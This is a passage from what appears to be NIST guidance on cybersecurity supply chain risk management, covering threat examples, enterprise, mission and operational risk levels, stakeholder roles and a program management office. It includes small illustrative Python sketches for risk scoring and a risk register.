• An organized criminal enterprise introduces counterfeit products onto the market,
resulting in a loss of customer trust and confidence.
• A company is on contract to produce a critical component of a larger acquisition, but the
company relabels products from an unvetted supplier. A critical component that cannot
be trusted is deployed into operational systems, and there is no trusted supplier of
replacement parts.
16 SECURE Technology Act - Public Law 115-390: https://www.govinfo.gov/app/details/COMPS-15413
17 To qualify as a cybersecurity risk throughout the supply chain, insider threats specifically deal with instances of third-party insider threats.
Risks such as these are realized when threats in the cybersecurity supply chain exploit existing
vulnerabilities. Figure 2-2 depicts supply chain cybersecurity risks resulting from the likelihood
that relevant threats may exploit applicable vulnerabilities and the consequential potential
impacts.
Fig. 2-2: Cybersecurity Risks Throughout the Supply Chain
Supply chain cybersecurity vulnerabilities may lead to persistent negative impacts on an
enterprise’s missions, ranging from a reduction in service levels leading to customer
dissatisfaction to the theft of intellectual property or the degradation of critical mission and
business processes. It may, however, take years for such vulnerabilities to be exploited or
discovered. It may also be difficult to determine whether an event was the direct result of a
supply chain vulnerability. Vulnerabilities in the supply chain are often interconnected and may
expose enterprises to cascading cybersecurity risks. For example, a large-scale service outage at
a major cloud services provider may cause service or production disruptions for multiple entities
within an enterprise’s supply chain and lead to negative effects within multiple mission and
business processes.
[Figure 2-2 summarizes cybersecurity risks throughout the supply chain as the interplay of
threats, vulnerabilities, likelihood, and impact. Threats may be adversarial (e.g., insertion of
malware, counterfeits, industrial espionage, supply disruption, service outage, foreign
intelligence entities) or non-adversarial (e.g., natural disasters, poor-quality products or services,
geopolitical events such as war, or legal and regulatory changes affecting supply, such as
sanctions). Vulnerabilities may be external (e.g., interdependencies in the supply chain, such as
primary suppliers with common level-2 suppliers; supply chain entity weaknesses, such as
inadequate capacity; or inadequate cyber hygiene) or internal (e.g., vulnerable information
systems and components, unpatched systems, ineffective security controls, or a lack of cyber
awareness). Likelihood, the probability of a threat exploiting a vulnerability, is driven by
capability and intent for adversarial threats and by historical rates of occurrence for non-
adversarial threats. Impact is the degree of harm to mission and business functions (e.g., loss of
intellectual property due to data exfiltration, loss of customers and public trust due to data
disclosure, loss of classified information resulting in compromised national security, or
production delays due to supply chain disruptions).]
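
As a minimal illustration of the relationship the figure depicts, the Python sketch below scores
hypothetical threat and vulnerability pairings as the product of likelihood and impact and ranks
them for response planning. The scales and scenario values are invented for the example and are
not drawn from this publication.

    # Illustrative only: rank supply chain risk scenarios by likelihood x impact.
    scenarios = [
        # (threat, vulnerability, likelihood 0-1, impact 1-5)
        ("malware insertion by an adversary", "ineffective security controls", 0.15, 5),
        ("natural disaster at a supplier", "single-source tier-2 dependency", 0.05, 4),
        ("counterfeit components", "inadequate supplier vetting", 0.25, 3),
    ]

    # Address the highest-exposure combinations first.
    ranked = sorted(scenarios, key=lambda s: s[2] * s[3], reverse=True)
    for threat, vulnerability, likelihood, impact in ranked:
        print(f"{likelihood * impact:4.2f}  {threat} via {vulnerability}")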
2.3. Multilevel Risk Management18
To integrate risk management throughout an enterprise, [NIST SP 800-39] describes three levels,
depicted in Figure 2-3, that address risk from different perspectives: 1) the enterprise level, 2)
the mission and business process level, and 3) the operational level. C-SCRM requires the
involvement of all three levels.
Fig. 2-3: Multilevel Enterprise-Wide Risk Management19
In multilevel risk management, the C-SCRM process is seamlessly carried out across the three
tiers with the overall objective of continuous improvement in the enterprise’s risk-related
activities and effective inter- and intra-level communication among stakeholders with a vested
interest in C-SCRM.
C-SCRM activities can be performed by a variety of individuals or groups within an enterprise,
ranging from a single individual to committees, divisions, centralized program offices, or any
other enterprise structure. C-SCRM activities are distinct for different enterprises depending on
their structure, culture, mission, and many other factors. C-SCRM activities at each of the three
levels include the production of different high-level C-SCRM deliverables.
• At Level 1 (Enterprise), the overall C-SCRM strategy, policy, and implementation plan
set the tone, governance structure, and boundaries for how C-SCRM is managed across
the enterprise and guide C-SCRM activities performed at the mission and business
process levels.
• At Level 2 (Mission and Business Process), the mid-level C-SCRM strategies, policies,
and implementation plans assume the context and direction set forth at the enterprise
level and tailor them to the specific mission and business process.
• At Level 3 (Operational), the C-SCRM plans provide the basis for determining whether
an information system meets business, functional, and technical requirements and
include appropriately tailored controls. These plans are heavily influenced by the context
and direction provided by Level 2.
18 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
19 Additional information about the concepts depicted in Figure 2-3 can be found in [NIST SP 800-39].
Figure 2-4 provides an overview of the multilevel risk management structure and the associated
strategies, policies, and plans developed at each level. Refer to Sections 2.3.1 through 2.3.5 for a
more in-depth discussion of the specific activities at each level.
Fig. 2-4: C-SCRM Documents in Multilevel Enterprise-wide Risk Management
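
A compact way to read the hierarchy in Figure 2-4 is as a mapping from each level to the
C-SCRM documents produced there. The sketch below is illustrative; the deliverable names
paraphrase Section 2.3, and the structure itself is an assumption made for the example.

    # Illustrative only: the Figure 2-4 document hierarchy expressed as data.
    cscrm_documents = {
        1: ("Enterprise",
            ["C-SCRM strategy", "C-SCRM policy", "C-SCRM implementation plan"]),
        2: ("Mission and Business Process",
            ["Mid-level C-SCRM strategy, policy, and implementation plan"]),
        3: ("Operational",
            ["C-SCRM plan for the information system"]),
    }

    # Direction flows downward: each level tailors the context set above it.
    for level in sorted(cscrm_documents):
        name, deliverables = cscrm_documents[level]
        print(f"Level {level} ({name}): {'; '.join(deliverables)}")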
2.3.1. Roles and Responsibilities Across the Three Levels
Implementing C-SCRM requires enterprises to establish a coordinated team-based approach and
a shared responsibility model to effectively manage cybersecurity risks throughout the supply
chain. Enterprises should establish and adhere to C-SCRM-related policies, develop and follow
processes (often cross-enterprise in nature), and employ programmatic and technical mitigation
techniques. The coordinated team approach, either ad hoc or formal, enables enterprises to
effectively conduct a comprehensive, multi-perspective analysis of their supply chain and to
respond to risks, communicate with external partners/stakeholders, and gain broad consensus
regarding appropriate resources for C-SCRM. The C-SCRM team should work together to make
decisions and take actions deriving from the input and involvement of multiple perspectives and
expertise. The team leverages but does not replace those C-SCRM responsibilities and processes
that should be specifically assigned to an individual enterprise or disciplinary area. Effective
implementations of C-SCRM often include the adoption of a shared responsibility model, which
distributes responsibilities and accountabilities for C-SCRM-related activities and risk across a
diverse group of stakeholders. Examples of C-SCRM activities in which enterprises benefit from
a multidisciplinary approach include developing a strategic sourcing strategy, incorporating C-
SCRM requirements into a solicitation, and determining options for how best to mitigate an
identified supply chain risk, especially one assessed to be significant.
Members of the C-SCRM team should be a diverse group of people involved in the various
aspects of the enterprise’s critical processes, such as information security, procurement,
enterprise risk management, engineering, software development, IT, legal, and HR. To aid in C-
SCRM, these individuals should provide expertise in enterprise processes and practices specific
to their discipline area and an understanding of the technical aspects and inter-dependencies of
systems or information flowing through systems. The C-SCRM team may be an extension of an
enterprise’s existing enterprise risk management function, grown as part of an enterprise’s
cybersecurity risk management function, or operate out of a different department.
The key to forming multidisciplinary C-SCRM teams is breaking down barriers between
otherwise disparate functions within the enterprise. Many enterprises begin this process from the
top by establishing a working group or council of senior leaders with representation from the
necessary and appropriate functional areas. A charter should be established outlining the goals,
objectives, authorities, meeting cadences, and responsibilities of the working group. Once this
council is formed, decisions can be made on how to operationalize the interdisciplinary approach
at mission and business process and operational levels. This often takes the form of working
groups that consist of mission and business process representatives who can meet at more regular
cadences and address more operational and tactically focused C-SCRM challenges.
Table 2-1 shows a summary of C-SCRM stakeholders for each level with the specific C-SCRM
activities performed within the corresponding level. These activities are either direct C-SCRM
activities or have an impact on C-SCRM.
Table 2-1: Cybersecurity Supply Chain Risk Management Stakeholders20

Level 1 – Enterprise
Generic Stakeholders – Executive Leadership: CEO, CIO, COO, CFO, CISO, Chief Technology Officer (CTO), Chief Acquisition Officer (CAO), Chief Privacy Officer (CPO), CRO, etc.
Activities:
• Define enterprise C-SCRM strategy.
• Form governance structures and operating model.
• Frame risk for the enterprise, and set the tone for how risk is managed (e.g., set risk appetite).
• Define high-level implementation plan, policy, goals, and objectives.
• Make enterprise-level C-SCRM decisions.
• Form a C-SCRM PMO.

Level 2 – Mission and Business Process
Generic Stakeholders – Business Management: program management [PM], project managers, integrated project team (IPT) members, research and development (R&D), engineering (SDLC oversight), acquisition and supplier relationship management/cost accounting, and other management related to reliability, safety, security, quality, the C-SCRM PMO, etc.
Activities:
• Develop mission and business process-specific strategy.
• Develop policies and procedures, guidance, and constraints.
• Reduce vulnerabilities at the onset of new IT projects and/or related acquisitions.
• Review and assess system, human, or organizational flaws that expose business, technical, and acquisition environments to cyber threats and attacks.
• Develop C-SCRM implementation plan(s).
• Tailor the enterprise risk framework to the mission and business process (e.g., set risk tolerances).
• Manage risk within mission and business processes.
• Form and/or collaborate with a C-SCRM PMO.
• Report on C-SCRM to Level 1 and act on reporting from Level 3.

Level 3 – Operational
Generic Stakeholders – Systems Management: architects, developers, system owners, QA/QC, testing, contracting personnel, C-SCRM PMO staff, control engineer and/or control system operator, etc.
Activities:
• Develop C-SCRM plans.
• Implement C-SCRM policies and requirements.
• Adhere to constraints provided by Level 1 and Level 2.
• Tailor C-SCRM to the context of the individual system, and apply it throughout the SDLC.
• Report on C-SCRM to Level 2.

20 Small and mid-sized businesses may not see such a high degree of differentiation in their C-SCRM stakeholders.
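As a rough, non-normative illustration of the structure summarized in Table 2-1, the sketch below encodes each level's primary deliverables and the direction in which C-SCRM reporting flows. All names are paraphrased from the table; the structure itself is hypothetical.

```python
# Hypothetical encoding of the three levels, their deliverables, and the
# reporting flow (Level 3 -> Level 2 -> Level 1); illustrative only.
LEVELS = {
    1: {"name": "Enterprise",
        "deliverables": ["C-SCRM Strategy", "C-SCRM Policy",
                         "High-Level Implementation Plan"],
        "reports_to": None},
    2: {"name": "Mission and Business Process",
        "deliverables": ["Mission-level C-SCRM strategy",
                         "C-SCRM implementation plan(s)"],
        "reports_to": 1},
    3: {"name": "Operational",
        "deliverables": ["C-SCRM plan(s)"],
        "reports_to": 2},
}

for level, info in LEVELS.items():
    target = (LEVELS[info["reports_to"]]["name"]
              if info["reports_to"] else "(sets direction)")
    print(f"Level {level} ({info['name']}): reports to {target}")
```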
The C-SCRM process should be carried out across the three risk management levels with the
overall objective of continuous improvement of the enterprise’s risk-related activities and
effective inter- and intra-level communication, thus integrating both strategic and tactical
activities among all stakeholders with a shared interest in the mission and business success of the
enterprise. Whether addressing a component, system, process, mission process, or policy, it is
important to engage the relevant C-SCRM stakeholders at each level to ensure that risk
management activities are as informed as possible. Figure 2-5 illustrates the relationship between
key C-SCRM documents across the three levels.
Fig. 2-5: Relationship Between C-SCRM Documents
The next few sections provide example roles and activities at each level. Because every
enterprise is different, however, activities may be performed at different levels than those listed, as individual enterprise context requires.
2.3.2. Level 1 – Enterprise
Effective C-SCRM requires commitment, direct involvement, and ongoing support from senior
leaders and executives. Enterprises should designate the responsibility for leading agency-wide
SCRM activities to an executive-level individual, office (supported by an expert staff), or group
(e.g., a risk board, executive steering committee, or executive leadership council) regardless of
an agency’s specific organizational structure. Because cybersecurity risks throughout the supply
chain can be present across every major business line, enterprises should ensure that C-SCRM
roles and responsibilities are defined for senior leaders who participate in supply chain activities (e.g., acquisition and procurement, information security, information technology, legal, program management, and supply chain and logistics). Without establishing executive oversight of C-SCRM activities, enterprises are limited in their ability to make risk decisions across the organization about how to effectively secure their products and services.

Appendix A provides a number of mission and business C-SCRM controls that organizations can utilize in a tailored capacity to help guide Level 1, Level 2, and Level 3 C-SCRM activities. Note that the tailoring should be scoped to the organization’s risk management needs, and organizations should analyze the cost of not implementing C-SCRM policies, capabilities, and controls when evaluating alternative risk response courses of action. These costs may include poor quality or counterfeit products, supplier misuse of intellectual property, supplier tampering with or compromise of mission-critical information, and exposure to cyber attacks through vulnerable supplier information systems.
Level 1 (Enterprise) sets the tone and direction for enterprise-wide C-SCRM activities by
providing an overarching C-SCRM strategy, a C-SCRM policy, and a High-Level Implementation Plan that shapes how C-SCRM is implemented across the enterprise. Within Level 1, governance structures are formed to enable senior leaders and executives to collaborate
on C-SCRM with the risk executive (function), make C-SCRM decisions, delegate decisions to
Level 2 and Level 3, and prioritize enterprise-wide resource allocation for C-SCRM. Level 1
activities help to ensure that C-SCRM mitigation strategies are consistent with the strategic goals
and objectives of the enterprise. Level 1 activities culminate in the C-SCRM Strategy, Policy,
and High-Level Implementation Plan that shape and constrain how C-SCRM is carried out at
Level 2 and Level 3.
C-SCRM requires accountability, commitment, oversight, direct involvement, and ongoing
support from senior leaders and executives. Enterprises should ensure that C-SCRM roles and
responsibilities are defined for senior leaders who participate in supply chain activities (e.g.,
acquisition and procurement, information security, information technology, legal, program
management, and supply chain and logistics). At Level 1, an executive board is typically
responsible for evaluating and mitigating all risks across the enterprise. This is generally
achieved through an Enterprise Risk Management (ERM) council. Effective C-SCRM gathers
perspectives from leaders, all generally within the ERM council – such as the chief executive
officer (CEO), chief risk officer (CRO), chief information officer (CIO), chief legal officer
(CLO)/general counsel, chief information security officer (CISO), and chief acquisition officer
(CAO) – and informs advice and recommendations from the CIO and CISO to the executive
board.
CIOs and/or CISOs may form a C-SCRM oriented-body to provide in-depth analysis to inform
the executive board’s ERM council. The C-SCRM council serves as a forum for setting priorities
and managing cybersecurity risk in the supply chain for the enterprise. The C-SCRM council or
other C-SCRM-oriented body is responsible for developing the C-SCRM enterprise-wide strategy. The C-SCRM strategy makes explicit the enterprise’s assumptions, constraints, risk tolerances, and priorities/trade-offs as established by the ERM council. C-SCRM is integrated into the organization’s overall enterprise risk management through the CIO and/or CISO membership within the executive board’s ERM council.

Ownership and accountability for cybersecurity risks in the supply chain ultimately lie with the head of the organization.
• Decision-makers are informed by an organization’s risk profile, risk appetite, and risk tolerance levels. Processes should address when and how the escalation of risk decisions needs to occur.
• Ownership should be delegated to authorizing officials within the agency based on their executive authority over organizational missions, business operations, or information systems.
• Authorizing officials may further delegate responsibilities to designated officials who are responsible for the day-to-day management of risk.
These leaders are also responsible and accountable for developing and promulgating a holistic
set of policies that span the enterprise’s mission and business processes, guiding the
establishment and maturation of a C-SCRM capability and the implementation of a cohesive set
of C-SCRM activities. Leaders should establish a C-SCRM PMO or other dedicated C-SCRM-
related function to drive C-SCRM activities and serve as a fulcrum for coordinated, C-SCRM-
oriented services and guidance to the enterprise. Leaders should also clearly articulate the lead
roles at the mission and business process level that are responsible and accountable for detailing
action plans and executing C-SCRM activities. Enterprises should consider that without
establishing executive oversight of C-SCRM activities, enterprises are limited in their ability to
make risk decisions across the organization about how to effectively secure their products and services.
The C-SCRM governance structures and operational model dictate the authority, responsibility,
and decision-making power for C-SCRM and define how C-SCRM processes are accomplished
within the enterprise. The best C-SCRM governance and operating model is one that meets the
business and functional requirements of the enterprise. For example, an enterprise facing strict
budgetary constraints or stiff C-SCRM requirements may consider governance and operational
models that centralize the decision-making authority and rely on a C-SCRM PMO to consolidate
responsibilities for resource-intensive tasks, such as vendor risk assessments. In contrast,
enterprises that have mission and business processes governed with a high degree of autonomy
or that possess highly differentiated C-SCRM requirements may opt for decentralized authority,
responsibilities, and decision-making power.
In addition to defining C-SCRM governance structures and operating models, Level 1 carries out
the activities necessary to frame C-SCRM for the enterprise. C-SCRM framing is the process by
which the enterprise makes explicit the assumptions about cybersecurity risks throughout the
supply chain (e.g., threats, vulnerabilities, risk impact,21 risk likelihood), constraints (e.g.,
enterprise policies, regulations, resource limitation, etc.), appetite and tolerance, and priorities
and trade-offs that guide C-SCRM decisions across the enterprise. The risk framing process
provides the inputs necessary to establish the C-SCRM strategy that dictates how the enterprise
plans to assess, respond to, and monitor cybersecurity risks throughout the supply chain. A high-
level implementation plan should also be developed to guide the execution of the enterprise’s C-
SCRM strategy. The risk framing process is discussed in further detail in Appendix C.
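To make the framing outputs concrete, the following sketch represents a risk frame as a structured record that downstream assess, respond, and monitor activities could consume. The field names and values are hypothetical and are not a format defined by this publication.

```python
# Hypothetical structure for the outputs of the risk framing step.
from dataclasses import dataclass, field

@dataclass
class RiskFrame:
    assumptions: list[str]      # e.g., assumed threats and vulnerabilities
    constraints: list[str]      # e.g., policies, regulations, resource limits
    risk_appetite: str          # broad statement of acceptable risk
    risk_tolerances: dict[str, float] = field(default_factory=dict)
    priorities: list[str] = field(default_factory=list)

frame = RiskFrame(
    assumptions=["Upstream suppliers may be compromised"],
    constraints=["Fixed annual C-SCRM budget"],
    risk_appetite="Low appetite for risk to mission-critical systems",
    risk_tolerances={"supplier_assessment_overdue_days": 90.0},
    priorities=["Assess mission-critical suppliers first"],
)
print(frame.risk_appetite)
```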
Informed by the risk framing process and the C-SCRM strategy, Level 1 provides the
enterprise’s C-SCRM policy. The C-SCRM policy establishes the C-SCRM program’s purpose,
outlines the enterprise’s C-SCRM responsibilities, defines and grants authority to C-SCRM roles
across the enterprise, and outlines applicable C-SCRM compliance and enforcement expectations
21 Risk impact refers to the effect on organizational operations, organizational assets, individuals, other organizations, or the Nation (including the
national security interests of the United States) of a loss of confidentiality, integrity, or availability of information or a system [800-53 R5].
and processes. Appendix C provides example templates for the C-SCRM Strategy and C-SCRM
Policy.
Risk assessment activities performed at Level 1 focus on assessing, responding to, and
monitoring cybersecurity risks throughout the supply chain. Level 1 risk assessments may be
based on the enterprise’s Level 1 Frame step (i.e., assumptions, constraints, appetite, tolerances,
priorities, and trade-offs) or may be aggregated enterprise-level assumptions based on risk
assessments that are completed across multiple mission and business processes. For example, a
Level 1 risk assessment may assess the exposure to threats to enterprise objectives that arise
through supply chain products or services. Level 1 risk assessments may also aim to aggregate
and recontextualize risk assessments completed at Level 2 to describe risk scenarios against the
enterprise’s primary objectives.
Reporting plays an important role in equipping Level 1 decision-makers with the context
necessary to make informed decisions on how to manage cybersecurity risks throughout the
supply chain. Reporting should focus on enterprise-wide trends and include coverage of the
extent to which C-SCRM has been implemented across the enterprise, the effectiveness of C-
SCRM, and the conditions related to cybersecurity risks throughout the supply chain. C-SCRM
reports should highlight any conditions that require urgent leadership attention and/or action and
may benefit from highlighted C-SCRM risk and performance trends over a period of time. Those
responsible and accountable for C-SCRM within the enterprise should work with leaders to
identify reporting requirements, such as frequency, scope, and format. Reporting should include
metrics discussed further in Section 3.5.1.
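As a toy illustration of reporting against enterprise-defined thresholds, the sketch below flags metrics that breach a tolerance. The metric names, values, and thresholds are invented for illustration and are not prescribed by this publication.

```python
# Hypothetical reporting check: flag metrics that breach tolerance thresholds.
metrics = {
    "suppliers_assessed_pct": 72.0,
    "open_critical_findings": 4,
}
tolerances = {
    "suppliers_assessed_pct": ("min", 80.0),  # at least 80% of suppliers assessed
    "open_critical_findings": ("max", 2),     # no more than 2 open critical findings
}

for name, value in metrics.items():
    direction, threshold = tolerances[name]
    breached = value < threshold if direction == "min" else value > threshold
    print(f"{name}: {value} ({direction} {threshold}) -> "
          f"{'ESCALATE to leadership' if breached else 'within tolerance'}")
```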
Level 1 activities ultimately provide the overarching context and boundaries within which the
enterprise’s mission and business processes manage cybersecurity risks throughout the supply
chain. Outputs from Level 1 (e.g., C-SCRM Strategy, C-SCRM Policy, Governance, and
Operating Model) are further tailored and refined within Level 2 to fit the context of each
mission and business process. Level 1 outputs should also be iteratively informed by and updated
as a result of C-SCRM outputs at lower levels.
Note that, in complex enterprises, Level 1 activities may be completed at an enterprise level and
at an individual organization level. Enterprise Level 1 activities should shape and guide
Organization Level 1 activities.
Additional information can be found in Appendix A of this document and SR-1, SR-3, PM-2,
PM-6, PM-7, PM-9, PM-28, PM-29, PM-30, and PM-31 of NIST SP 800-53, Rev. 5.
2.3.3. Level 2 – Mission and Business Process
Level 2 addresses how the enterprise mission and business processes assess, respond to, and
monitor cybersecurity risks throughout the supply chain. Level 2 activities are performed in
accordance with the C-SCRM strategy and policies provided by Level 1.22 In this level, process-
specific C-SCRM strategies, policies, and implementation plans dictate how the enterprise’s C-
22 For more information, see [NIST SP 800-39, Section 2.2].
SCRM goals and requirements are met within each mission and business process. Here, specific
C-SCRM program requirements are defined and managed and include cost, schedule,
performance, security, and a variety of critical non-functional requirements. These non-
functional requirements include concepts such as reliability, dependability, safety, security, and
quality.
Level 2 roles include representatives of each mission and business process, such as program
managers, research and development, and acquisitions/procurement. Level 2 C-SCRM activities
address C-SCRM within the context of the enterprise’s mission and business process. Specific
strategies, policies, and procedures should be developed to tailor the C-SCRM implementation to
fit the specific requirements of each mission and business process. In order to further develop the
high-level Enterprise Strategy and Implementation Plan, different mission areas or business lines
within the enterprise may need to generate their own tailored mission and business-level strategy
and implementation plan, and they should ensure that C-SCRM execution occurs within the
constraints defined by higher-level C-SCRM strategies and in conformance with C-SCRM policies.
To facilitate the development and execution of Level 2 Strategy and Implementation plans,
enterprises may benefit from forming a committee with representation from each mission and
business process. Coordination and collaboration between the mission and business processes
can help drive risk awareness, identify cybersecurity risks throughout the supply chain, and
support the development of an enterprise and C-SCRM architecture. A C-SCRM PMO may also
assist in the implementation of C-SCRM at Level 2 through the provision of services (e.g., policy
templates, C-SCRM subject matter expert [SME] support).
Many threats to and through the supply chain are addressed at Level 2 in the management of
third-party relationships with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers. Because C-SCRM can both directly and
indirectly impact mission processes, understanding, integrating, and coordinating C-SCRM
activities at this level are critical. Level 2 activities focus on tailoring and applying the
enterprise’s C-SCRM frame to fit the specific mission and business process threats,
vulnerabilities, impacts,23 and likelihoods. Informed by outputs from Level 1 (e.g., C-SCRM
strategy), mission and business processes will adopt a C-SCRM strategy that tailors the
enterprise’s overall strategy to a specific mission and business process. At Level 2, the enterprise
may also issue mission and business process-specific policies that contextualize the enterprise’s
policy for the process.
In accordance with the C-SCRM strategy, enterprise leaders for specific mission and business
processes should develop and execute a C-SCRM implementation plan. The C-SCRM
implementation plan provides a more detailed roadmap for operationalizing the C-SCRM
strategy within the mission and business process. Within the C-SCRM implementation plans, the
mission and business process will specify C-SCRM roles, responsibilities, implementation
milestones, dates, and processes for monitoring and reporting. Appendix D of this document
23 These impacts refer to the effects on organizational operations, organizational assets, individuals, other organizations, or the Nation (including
the national security interests of the United States) of a loss of confidentiality, integrity, or availability of information or a system [SP 800-53,
Rev. 5].
provides example templates for the C-SCRM Strategy, Implementation Plan, and the C-SCRM
Policy.
C-SCRM activities performed at Level 2 focus on assessing, responding to, and monitoring risk
exposure arising from the mission and business process dependencies on suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service
providers. Risk exposures to the supply chain may occur as a result of primary dependencies on
the supply chain or secondary dependencies on individual information systems or other mission
and business processes. For example, risk exposure may arise due to a supplier providing critical
system components or services to multiple information systems on which critical processes
depend. Risk may also arise from vendor-sourced products and services unrelated to information
systems, as well as the roles that these products and services play in the overall mission and
business process objectives. Enterprises should consider non-traditional sources of cybersecurity
risks throughout the supply chain. These risks may circumvent or escape C-SCRM processes,
such as those arising from the use of open source software. Enterprises should establish policies
and controls to manage non-traditional cybersecurity risks throughout the supply chain.
Reporting at Level 2 plays an important role in equipping mission and business process leaders
with the context necessary to manage C-SCRM within the scope of their mission and business
processes. Topics covered at Level 2 will reflect those covered at Level 1 but should be reshaped
to focus on the specific mission and business process that they correspond to. Level 2 reporting
should include metrics that demonstrate the mission and business process performance in
contrast to the enterprise-defined risk appetite and risk tolerance statements defined at Level 1
and Level 2. Reporting requirements should be defined to fit the needs of leaders in mission and
business processes and at Level 1.
Outputs from Level 2 activities will significantly impact how C-SCRM activities are carried out
at Level 3. For example, risk tolerance and common control baseline decisions may be defined at
Level 2 and then tailored and applied within the context of individual information systems at Level 3.
Level 2 outputs should also be used to iteratively influence and further refine Level 1 outputs.
Additional information can be found in Appendix A of this document and SR-1, SR-3, SR-6, PM-
2, PM-6, PM-7, PM-30, PM-31, and PM-32 of NIST SP 800-53, Rev. 5.
2.3.4. Level 3 – Operational
Level 3 comprises personnel responsible and accountable for operational activities,
including conducting procurements and executing system-related C-SCRM activities as part of
the enterprise’s SDLC, which includes research and development, design, manufacturing,
delivery, integration, operations and maintenance, and the disposal/retirement of systems. These
personnel include system owners, contracting officers, contracting officer representatives,
architects, system engineers, information security specialists, system integrators, and developers.
These personnel are responsible for developing C-SCRM plans that address the management,
implementation assurance, and monitoring of C-SCRM controls (to include those applicable to
external parties, such as contractors) and the acquisition, development, and sustainment of
systems and components across the SDLC to support mission and business processes. In
enterprises where a C-SCRM PMO has been established, activities such as product risk
assessments may be provided as a centralized, shared service.
Within Level 3, outputs provided by C-SCRM activities completed at Level 1 and Level 2
prepare the enterprise to execute C-SCRM at the operational level in accordance with the RMF
[NIST 800-37r2]. C-SCRM is applied to information systems through the development and
implementation of C-SCRM plans. These plans are heavily influenced by assumptions,
constraints, risk appetite and tolerance, priorities, and trade-offs defined by Level 1 and Level 2.
C-SCRM plans dictate how C-SCRM activities are integrated into all systems in the SDLC:
acquisition (both custom and off-the-shelf), requirements, architectural design, development,
delivery, installation, integration, maintenance, and disposal/retirement. In general, C-SCRM
plans are implementation-specific and provide policy implementation, requirements, constraints,
and implications for systems that support mission and business processes.
Level 3 activities focus on managing operational-level risk exposure resulting from any ICT/OT-
related products and services provided through the supply chain that are in use by the enterprise
or fall within the scope of the systems authorization boundary. Level 3 C-SCRM activities begin
with an analysis of the likelihood and impact of potential supply chain cybersecurity threats
exploiting an operational-level vulnerability (e.g., in a system or system component). Where
applicable, these risk assessments should be informed by risk assessments completed in Level 1
and Level 2. In response to determining risk, enterprises should evaluate alternative courses of
action for reducing risk exposure (e.g., accept, avoid, mitigate, share, and/or transfer). Risk
response is achieved by selecting, tailoring, implementing, and monitoring C-SCRM controls
throughout the SDLC in accordance with the RMF [NIST 800-37r2]. Selected C-SCRM controls often consist of a combination of common controls inherited from Level 1 and Level 2 and information system-specific controls at Level 3.
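The evaluation of alternative courses of action can be pictured as a simple decision rule. SP 800-161r1 names the response types (accept, avoid, mitigate, share, transfer), but the thresholds and logic below are hypothetical and purely illustrative.

```python
# Hypothetical decision sketch for selecting a risk response course of action.
def choose_response(risk_score: float, tolerance: float,
                    mitigation_available: bool) -> str:
    """Return one of: accept, mitigate, share/transfer, avoid."""
    if risk_score <= tolerance:
        return "accept"          # within tolerance: document and monitor
    if mitigation_available:
        return "mitigate"        # select, tailor, and implement C-SCRM controls
    if risk_score <= 2 * tolerance:
        return "share/transfer"  # e.g., contractual terms or insurance
    return "avoid"               # e.g., select an alternative source of supply

print(choose_response(risk_score=6.0, tolerance=4.0, mitigation_available=True))
```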
Reporting at Level 3 should focus on C-SCRM implementation, efficiency, and effectiveness,
and the overall level of exposure to cybersecurity risks in the supply chain for the particular
system. System-level reporting should provide system owners with tactical-level insights that
enable them to make rapid adjustments and respond to risk conditions. Level 3 reporting should
include metrics that demonstrate performance against the enterprise risk appetite statements and
risk tolerance statements defined at Levels 1, 2, and 3.
A critical Level 3 activity is the development of the C-SCRM plan. Along with applicable
security control information, the C-SCRM plan includes information on the system, its
categorization, operational status, related agreements, architecture, critical system personnel,
related laws, regulations, policies, and contingency plan. In C-SCRM, continuous hygiene is
critical, and the C-SCRM plan is a living document that should be maintained and used as the
reference for the continuous monitoring of implemented C-SCRM controls. C-SCRM plans are
intended to be referenced regularly and should be reviewed and refreshed periodically. These are
not intended to be documents developed to satisfy a compliance requirement. Rather, enterprises
should be able to demonstrate how they have historically and continue to effectively employ
their plans to shape, align, inform, and take C-SCRM actions and decisions across all three
levels.
Information gathered as part of Level 3 C-SCRM activities should iteratively inform C-SCRM
activities completed within Level 1 and Level 2 to further refine C-SCRM strategies and
implementation plans.
Additional information can be found in Appendix A of this document and SR-1, SR-2, SR-6, PL-2,
PM-31, and PM-32 of NIST SP 800-53, Rev. 5.
2.3.5. C-SCRM PMO
A variety of operating models (e.g., centralized, decentralized, hybrid) facilitate C-SCRM
activities across the enterprise and its mission and business processes. One such model involves
concentrating and assigning responsibilities for certain C-SCRM activities to a central PMO. In
this model, the C-SCRM PMO acts as a service provider to other mission and business
processes. Mission and business processes are then responsible for selecting and requesting
services from the C-SCRM PMO as part of their responsibilities to meet the enterprise’s C-
SCRM goals and objectives. There are a variety of beneficial services that a PMO may provide:
• Advisory services and subject matter expertise
• Chair for internal C-SCRM working groups, council, or other coordination bodies
• Centralized hub for tools, job aids, awareness, and training templates
• Supplier and product risk assessments
• Liaison to external stakeholders
• Information-sharing management (e.g., intra department/agency and to/from FASC)
• Management of C-SCRM risk register (see the sketch after this list)
• Secretariat/staffing function for enterprise C-SCRM governance
• C-SCRM project and performance management
• C-SCRM briefings, presentations, and reporting
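As a minimal, non-normative sketch of the risk register service referenced in the list above, the structure below records the core attributes a register entry might carry; the field names and entries are hypothetical.

```python
# Hypothetical C-SCRM risk register entry; fields are illustrative only.
from dataclasses import dataclass

@dataclass
class RiskRegisterEntry:
    risk_id: str
    description: str
    likelihood: float   # 0-1 probability
    impact: int         # 1-5 degree of harm
    response: str       # accept / avoid / mitigate / share / transfer
    owner: str          # accountable official or office

register = [
    RiskRegisterEntry("R-001", "Critical component is single-sourced",
                      0.4, 5, "mitigate", "C-SCRM PMO"),
    RiskRegisterEntry("R-002", "Supplier lacks a vulnerability disclosure process",
                      0.6, 3, "share", "Procurement"),
]

# List entries from highest to lowest risk score.
for e in sorted(register, key=lambda e: e.likelihood * e.impact, reverse=True):
    print(f"{e.risk_id}: score={e.likelihood * e.impact:.1f} "
          f"response={e.response} owner={e.owner}")
```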
A C-SCRM PMO typically consists of C-SCRM SMEs who help drive the C-SCRM strategy
and implementation across the enterprise and its mission and business processes. A C-SCRM
PMO may include or report to a dedicated executive-level official responsible and accountable
for overseeing C-SCRM activities across the enterprise. A C-SCRM PMO should consist of
dedicated personnel or include matrixed representatives with responsibilities for C-SCRM from
several of the enterprise’s processes, including information security, procurement, risk
management, engineering, software development, IT, legal, and HR. Regardless of whether a C-
SCRM PMO sits at Level 1 or Level 2, it is critical that the C-SCRM PMO include cross-
disciplinary representation.
The C-SCRM PMO responsibilities may include providing services to the enterprise’s leaders
